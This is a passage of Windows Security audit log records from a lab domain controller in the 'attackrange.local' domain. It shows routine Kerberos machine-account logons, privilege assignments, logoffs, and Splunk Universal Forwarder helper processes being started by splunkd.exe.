TaskCategory=Logon
OpCode=Info
RecordNumber=264154
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7C34AB
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62345
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:52:19 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264153
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C34AB
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:52:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264161
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C4262
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:52:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264160
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7C4262
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62355
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:52:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264159
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C4262
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:53:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264163
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x57c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:53:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264162
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1afc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:53:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264164
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1ad0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:53:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264165
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x9bc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:53:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264166
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b70
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:53:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264168
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x3c0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:53:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264167
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x15bc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:53:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264171
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C7D4D
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:53:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264170
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7C7D4D
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62368
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:53:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264169
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C7D4D
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:54:03 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264172
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-DC-209$
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7BF8F8
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:54:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264185
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C826E
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:54:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264184
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C835C
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:54:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264183
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C83A4
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:54:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264182
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7C8455
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62377
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:54:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264181
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C8455
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:54:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264180
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7C83A4
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 62374
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:54:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264179
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C83A4
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:54:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264178
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7C835C
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:54:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264177
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C835C
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:54:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264176
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7C826E
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62373
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
